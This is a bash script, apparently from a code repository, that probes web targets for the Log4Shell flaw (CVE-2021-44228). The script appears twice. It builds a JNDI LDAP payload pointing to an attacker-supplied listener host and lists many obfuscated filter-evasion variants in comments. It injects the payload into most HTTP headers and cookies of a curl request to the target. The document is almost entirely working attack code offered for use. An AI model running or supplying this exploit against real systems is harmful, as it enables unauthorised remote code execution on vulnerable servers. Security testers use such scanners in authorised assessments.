dustinbutterworth/CVE-2021-44228.sh

## CVE-2021-44228.sh
#!/usr/bin/env bash
# Run with arguments like: ./CVE-2021-44228.sh aabbccddeeffgg.interact.sh https://test.com/test
LISTENER=$1
URL=$2
PAYLOAD='${jndi:ldap://'${LISTENER}'}'
# PAYLOAD='${jndi:${lower:l}${lower:d}a${lower:p}://'${LISTENER}''
# PAYLOAD='${j${k8s:k5:-ND}i${sd:k5:-:}ldap://'${LISTENER}'}'
# PAYLOAD='${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://'${LISTENER}'}'
# PAYLOAD='${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://'${LISTENER}'} '
# PAYLOAD='${${::-j}ndi:rmi://'${LISTENER}'} '
# PAYLOAD='${jndi:rmi://'${LISTENER}'}'
# PAYLOAD='${${lower:jndi}:${lower:rmi}://'${LISTENER}'} '
# PAYLOAD='${${lower:${lower:jndi}}:${lower:rmi}://'${LISTENER}'} '
# PAYLOAD='${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://'${LISTENER}'}'
# PAYLOAD='${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://'${LISTENER}'}'
# PAYLOAD='${${upper:jndi}:${upper:rmi}://'${LISTENER}'} '
# PAYLOAD='${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://'${LISTENER}'}'
# PAYLOAD='${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://'${LISTENER}'}'
# PAYLOAD='${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://'${LISTENER}'}'
# PAYLOAD='${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://'${LISTENER}'}'
# PAYLOAD='${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://'${LISTENER}'}'
echo "Listener: ${LISTENER}"
echo "URL: ${URL}"
echo "Payload: ${PAYLOAD}"
curl -k -L "{$URL}" \
-H 'Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'Accept-Language: '${PAYLOAD}'' \
-H 'Connection: close' \
-H 'Referer: '${PAYLOAD}'' \
-H 'X-Api-Version: '${PAYLOAD}'' \
-H 'Cookie: '${PAYLOAD}'='${PAYLOAD}';JSESSIONID='${PAYLOAD}';SESSIONID='${PAYLOAD}';PHPSESSID='${PAYLOAD}';token='${PAYLOAD}';session='${PAYLOAD}'' \
-H 'User-Agent: '${PAYLOAD}'' \
-H 'Pragma: no-cache' \
-H 'If-Modified-Since: '${PAYLOAD}'' \
-H 'Accept: '${PAYLOAD}'' \
--proxy http://127.0.0.1:8080
	#!/usr/bin/env bash
	# Run with arguments like: ./CVE-2021-44228.sh aabbccddeeffgg.interact.sh https://test.com/test
	LISTENER=$1
	URL=$2
	PAYLOAD='${jndi:ldap://'${LISTENER}'}'
	# PAYLOAD='${jndi:${lower:l}${lower:d}a${lower:p}://'${LISTENER}''
	# PAYLOAD='${j${k8s:k5:-ND}i${sd:k5:-:}ldap://'${LISTENER}'}'
	# PAYLOAD='${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://'${LISTENER}'}'
	# PAYLOAD='${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://'${LISTENER}'} '
	# PAYLOAD='${${::-j}ndi:rmi://'${LISTENER}'} '
	# PAYLOAD='${jndi:rmi://'${LISTENER}'}'
	# PAYLOAD='${${lower:jndi}:${lower:rmi}://'${LISTENER}'} '
	# PAYLOAD='${${lower:${lower:jndi}}:${lower:rmi}://'${LISTENER}'} '
	# PAYLOAD='${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://'${LISTENER}'}'
	# PAYLOAD='${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://'${LISTENER}'}'
	# PAYLOAD='${${upper:jndi}:${upper:rmi}://'${LISTENER}'} '
	# PAYLOAD='${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://'${LISTENER}'}'
	# PAYLOAD='${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://'${LISTENER}'}'
	# PAYLOAD='${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://'${LISTENER}'}'
	# PAYLOAD='${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://'${LISTENER}'}'
	# PAYLOAD='${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://'${LISTENER}'}'
	echo "Listener: ${LISTENER}"
	echo "URL: ${URL}"
	echo "Payload: ${PAYLOAD}"
	curl -k -L "{$URL}" \
	-H 'Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1' \
	-H 'Accept-Encoding: gzip, deflate' \
	-H 'Accept-Language: '${PAYLOAD}'' \
	-H 'Connection: close' \
	-H 'Referer: '${PAYLOAD}'' \
	-H 'X-Api-Version: '${PAYLOAD}'' \
	-H 'Cookie: '${PAYLOAD}'='${PAYLOAD}';JSESSIONID='${PAYLOAD}';SESSIONID='${PAYLOAD}';PHPSESSID='${PAYLOAD}';token='${PAYLOAD}';session='${PAYLOAD}'' \
	-H 'User-Agent: '${PAYLOAD}'' \
	-H 'Pragma: no-cache' \
	-H 'If-Modified-Since: '${PAYLOAD}'' \
	-H 'Accept: '${PAYLOAD}'' \
	--proxy http://127.0.0.1:8080